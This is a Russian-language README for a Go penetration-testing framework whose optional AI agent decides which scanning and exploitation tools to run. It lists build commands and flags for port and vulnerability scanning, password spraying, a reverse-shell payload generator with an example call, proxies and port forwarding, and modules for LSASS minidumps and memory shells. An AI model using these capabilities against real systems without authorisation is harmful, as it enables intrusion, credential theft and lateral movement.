
Фреймворк для тестирования на проникновение с движком принятия решений на основе ИИ
Windows-нативный фреймворк для пентестинга, написанный на Go. Модульная архитектура с движком принятия решений на базе ИИ (API, совместимый с OpenAI).
go build -ldflags="-X main.version=$(git describe --tags)" -o FUCKER.exe ./cmd/fucker/
Кросс-компиляция:
GOOS=linux GOARCH=amd64 go build -o FUCKER_linux_amd64 ./cmd/fucker/
GOOS=windows GOARCH=amd64 go build -o FUCKER_win_amd64.exe ./cmd/fucker/
GOOS=windows GOARCH=386 go build -o FUCKER_win_386.exe ./cmd/fucker/
FUCKER.exe -t example.com -portscan -fingerprint -vulnscan -report
FUCKER.exe -t example.com -subdomain -dirbuster
FUCKER.exe -socks 1080
FUCKER.exe -forward 3389:192.168.1.100:3389
FUCKER.exe -payload "revshell|10.0.0.1|4444"
Скопируйте .env.example в .env:
Без конфигурации ИИ инструмент работает в ручном режиме CLI (все флаги работают штатно).
Когда задан OPENAI_API_KEY, инструмент выполняет цикл ReAct: ИИ-агент решает, какие инструменты вызывать, на основе предыдущих результатов. Системный промпт определяет рабочий процесс пентеста: разведка -> фингерпринтинг -> сканирование уязвимостей -> эксплуатация -> отчёт.
Без ИИ весь функционал доступен через флаги CLI.
| Флаг | Описание |
|---|
-t | Целевой домен/IP/URL |
-p | Порты (через запятую или диапазон, по умолчанию: 80,443,22,21,3389,3306,6379,27017) |
-subdomain | Перебор поддоменов |
-portscan | Сканирование TCP-портов |
-fingerprint | Фингерпринтинг сервисов |
-dirbuster | Перебор директорий |
-vulnscan | Сканирование уязвимостей на основе POC |
-logic | Проверка логических уязвимостей |
-spray | Спрей-атака (password spraying) |
-exploit | Модули эксплуатации |
-report | Генерация отчёта HTML + JSON |
-o | Выходной файл (по умолчанию: report.html) |
-socks | Запуск SOCKS5-прокси на порту |
-httpproxy | Запуск HTTP-прокси на порту |
-forward | Проброс портов (local:host:remote) |
-payload | Генерация пейлоада (revshell|IP|PORT) |
-v | Подробный вывод |
-debug | Отладочный вывод |
-workers | Количество одновременных рабочих процессов (по умолчанию: 20) |
-timeout | Таймаут запроса в секундах (по умолчанию: 30) |
-proxy | URL прокси |
-audit | Путь к журналу аудита (по умолчанию: audit.json) |
| Переменная | Описание |
|---|
OPENAI_BASE_URL | Базовый URL API, совместимого с OpenAI |
OPENAI_API_KEY | API-ключ |
OPENAI_MODEL_NAME | Модель (по умолчанию: gpt-4) |
PROXY | URL прокси |
MAX_WORKERS | Максимум рабочих процессов (по умолчанию: 20) |
REQUEST_TIMEOUT | Таймаут в секундах (по умолчанию: 30) |
RETRY_COUNT | Количество повторов (по умолчанию: 3) |
| Пакет | Описание |
|---|
cmd/fucker/ | Точка входа, разбор CLI, оркестрация модулей |
internal/ai/ | OpenAI-клиент, цикл агента ReAct, система инструментов |
internal/scanner/ | Сканирование портов, перебор поддоменов, фингерпринтинг, dirbuster |
internal/vuln/ | Движок YAML POC, 16 встроенных POC, проверки логики |
internal/exploit/ | Генератор реверс-шеллов, SOCKS5/HTTP-прокси, memshell |
internal/lateral/ | Спрей-атака, LSASS minidump, SMB/RDP-прокси |
internal/report/ | HTML-шаблон отчёта, JSON-экспорт, оценка рисков |
internal/logger/ | Логирование с уровнями, журнал audit.json |
internal/plugin/ | Загрузчик Python/Go-плагинов |
internal/config/ | Загрузчик .env |
internal/common/ | Общие типы |